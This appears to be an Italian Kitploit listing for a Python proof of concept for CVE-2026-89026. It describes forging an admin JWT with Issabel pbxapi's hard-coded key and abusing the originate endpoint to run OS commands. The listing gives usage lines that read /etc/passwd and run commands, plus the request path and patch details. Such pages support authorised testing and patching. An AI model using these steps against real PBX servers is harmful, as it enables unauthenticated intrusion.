Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-89026 — PoC Python che falsifica un JWT HS256 hard-coded per sfruttare CVE-2026-89026 in Issabel pbxapi, consentendo l'esecuzione remota di comandi OS non autenticata tramite l'endpoint originate. | Kitploit
Strumenti/GitHubGitHub/cflowsec/cve-2026-89026
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlAutenticazioneStrumento di Accesso RemotoSviluppo Payload
GitHubcflowsec/cve-2026-89026

CVE-2026-89026

PoC Python che falsifica un JWT HS256 hard-coded per sfruttare CVE-2026-89026 in Issabel pbxapi, consentendo l'esecuzione remota di comandi OS non autenticata tramite l'endpoint originate.

8h 9m faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-89026

Issabel pbxapi RCE tramite JWT hard-coded POC

Issabel Framework pbxapi — forgiatura JWT non autenticata (chiave HS256 hard-coded) poi GET /pbxapi/manager/originate con Application=System per eseguire comandi OS come utente Asterisk. Corretto nel commit b97dbaf (chiave caricata da /etc/issabel.conf). Shadowserver ha osservato sfruttamento dal 2026-09-09.

Solo per test autorizzati. Non eseguire questo contro sistemi che non possiedi o per cui non hai il permesso di testare.

Richiede: Python 3, solo libreria standard.

root@kitploit:~
python3 cve-2026-89026-issabel-pbxapi-jwt-rce.py -u https://TARGET --test --insecure
python3 cve-2026-89026-issabel-pbxapi-jwt-rce.py -u https://TARGET --read /etc/passwd --insecure
python3 cve-2026-89026-issabel-pbxapi-jwt-rce.py -u https://TARGET --cmd id --insecure
python3 cve-2026-89026-issabel-pbxapi-jwt-rce.py -u TARGET --test
FlagCosa fa
-u / --urlURL base di Issabel (obbligatorio). http:// o https://. Un hostname senza schema viene provato prima come HTTPS, poi HTTP. I redirect http→https mantengono POST. I certificati TLS non validi vengono ritentati senza verifica; --insecure salta la verifica fin dall'inizio (Issabel usa spesso un certificato self-signed)
--testEsegue il fingerprint di /pbxapi e prova che un JWT admin forgiato viene accettato. Nessun originate / nessun comando
--read PATHEsegue cp PATH nella web root tramite System, poi esegue GET del file (è così che vedi /etc/passwd)
--cmd CMDGET /pbxapi/manager/originate?application=System&data=CMD. AMI non restituisce stdout — usa --read per visualizzare un file
--channelOriginate Channel (default Local/s@default)
--insecureSalta la verifica TLS
--timeoutTimeout HTTP in secondi (default 30)

Endpoint di --test: GET /pbxapi/ senza Authorization (atteso 403), poi lo stesso URL con Authorization: Bearer <JWT forgiato>. Un JSON 200 che elenca controllers / manager (o JSON di connessione AMI dopo l'autenticazione) è VULNERABLE. Non chiama originate.

Auth: non ce n'è per l'attaccante. L'API pensa di avere autenticazione Bearer JWT. Pre-patch pbxapi/index.php imposta JWT_KEY a una stringa compilata in ogni installazione. Il PoC firma HS256 {iat, exp, data.name=admin} con quella chiave. Post-patch la chiave è base64_decode(pbxapijwtsecret) da /etc/issabel.conf e il token stock viene rifiutato (NOT_VULNERABLE).

Stdout: PBXAPI, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, HANDLER, HTTP.

Working PoC

CVE: CVE-2026-89026. Crediti: Shadowserver Foundation / VulnCheck. Patch: b97dbaf.

Scarica lo strumento